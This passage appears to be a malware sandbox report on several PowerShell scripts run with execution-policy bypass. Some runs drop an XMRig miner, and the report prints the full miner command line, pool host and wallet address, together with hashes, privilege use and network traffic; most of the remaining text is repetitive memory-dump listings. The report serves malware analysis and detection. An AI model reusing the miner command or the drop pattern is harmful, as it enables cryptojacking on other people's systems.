memory/1672-103-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-104-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-105-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-106-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-107-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-108-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-109-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-110-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-111-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-112-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-113-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-114-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-115-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-116-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-117-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-118-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-119-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-120-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-121-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-122-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-123-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-124-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-125-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-126-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-127-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-128-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-129-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-130-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-131-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-132-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-133-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-134-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-135-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-136-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-137-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-138-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-139-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-140-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-141-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-142-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-143-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-144-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-145-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-146-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-147-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-148-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-149-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-150-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-151-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-152-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-153-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-154-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-155-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-156-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

memory/1672-157-0x00007FF6495B0000-0x00007FF64A1E3000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/4212-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp

memory/4212-5-0x000002003F870000-0x000002003F892000-memory.dmp

memory/4212-8-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-9-0x000002003FA20000-0x000002003FA96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmahcz4d.k35.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4212-10-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-48-0x000002003FA00000-0x000002003FA12000-memory.dmp

memory/4212-61-0x000002003F9E0000-0x000002003F9EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4612-90-0x000001EB01B30000-0x000001EB01B50000-memory.dmp

memory/4612-91-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4212-93-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4612-92-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4212-94-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp

memory/4212-95-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4212-96-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp

memory/4612-97-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-98-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-99-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-100-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-101-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-102-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-103-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-104-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-105-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-106-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-107-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-108-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-109-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-110-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-111-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-112-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-113-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-114-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-115-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-116-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-117-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-118-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-119-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-120-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-121-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-122-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-123-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-124-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-125-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-126-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-127-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-128-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-129-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-130-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-131-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-132-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-133-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-134-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-135-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-136-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-137-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-138-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-139-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-140-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-141-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-142-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-143-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-144-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-145-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-146-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-147-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-148-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-149-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-150-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-151-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-152-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-153-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-154-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-155-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-156-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

memory/4612-157-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win10v2004-20240508-en

Max time kernel

1625s

Max time network

1636s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/1976-0-0x00007FFA45923000-0x00007FFA45925000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1j5jifp.sd5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1976-1-0x0000027957740000-0x0000027957762000-memory.dmp

memory/1976-11-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-12-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-13-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-14-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-15-0x00007FFA45923000-0x00007FFA45925000-memory.dmp

memory/1976-16-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

memory/1976-17-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:47

Platform

win7-20240221-en

Max time kernel

1559s

Max time network

1560s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Network

N/A

Files

memory/2248-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

memory/2248-5-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2248-6-0x0000000002730000-0x0000000002738000-memory.dmp

memory/2248-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-11-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

memory/2248-12-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:51

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 224.107.17.2.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/4156-0-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1yjtfmd.0pk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4156-10-0x000001CDF9EE0000-0x000001CDF9F02000-memory.dmp

memory/4156-11-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-12-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-14-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4156-15-0x000001CDFAA40000-0x000001CDFAA52000-memory.dmp

memory/4156-16-0x000001CDFAA20000-0x000001CDFAA2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4296-47-0x0000025459430000-0x0000025459450000-memory.dmp

memory/4296-48-0x000002545AD70000-0x000002545AD90000-memory.dmp

memory/4296-49-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-52-0x000002545AD90000-0x000002545ADB0000-memory.dmp

memory/4296-51-0x000002545ADB0000-0x000002545ADD0000-memory.dmp

memory/4296-50-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4156-53-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp

memory/4156-54-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp

memory/4296-55-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-56-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-57-0x000002545ADB0000-0x000002545ADD0000-memory.dmp

memory/4296-58-0x000002545AD90000-0x000002545ADB0000-memory.dmp

memory/4296-59-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-60-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-61-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-62-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-63-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-64-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-65-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-66-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-67-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-68-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-69-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-70-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-71-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-72-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-73-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-74-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-75-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-76-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-77-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-78-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-79-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-80-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-81-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-82-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-83-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-84-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-85-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-86-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-87-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-88-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-89-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-90-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-91-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-92-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-93-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-94-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

memory/4296-95-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp

